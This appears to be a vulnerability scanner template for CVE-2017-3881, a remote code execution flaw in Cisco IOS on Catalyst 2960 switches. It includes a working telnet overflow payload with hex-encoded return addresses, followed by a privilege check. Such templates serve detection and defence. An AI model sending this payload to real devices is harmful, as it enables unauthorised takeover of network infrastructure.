id: CVE-2017-3881

info:
  name: Cisco IOS 12.2(55)SE11 Remote Code Execution
  author: dwisiswant0
  severity: critical
  reference:
    - https://github.com/artkond/cisco-rce
    - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
  description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent.
  tags: cve,cve2017,cisco,rce,network
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2017-3881
    cwe-id: CWE-20

network:
  - inputs:
      - data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}"
        read: 1024
      - data: "show priv"
        read: 1024

    host:
      - "{{Hostname}}"
      - "{{Host}}:23"

    read-size: 1024
    matchers:
      - type: word
        words:
          - "Current privilege level is"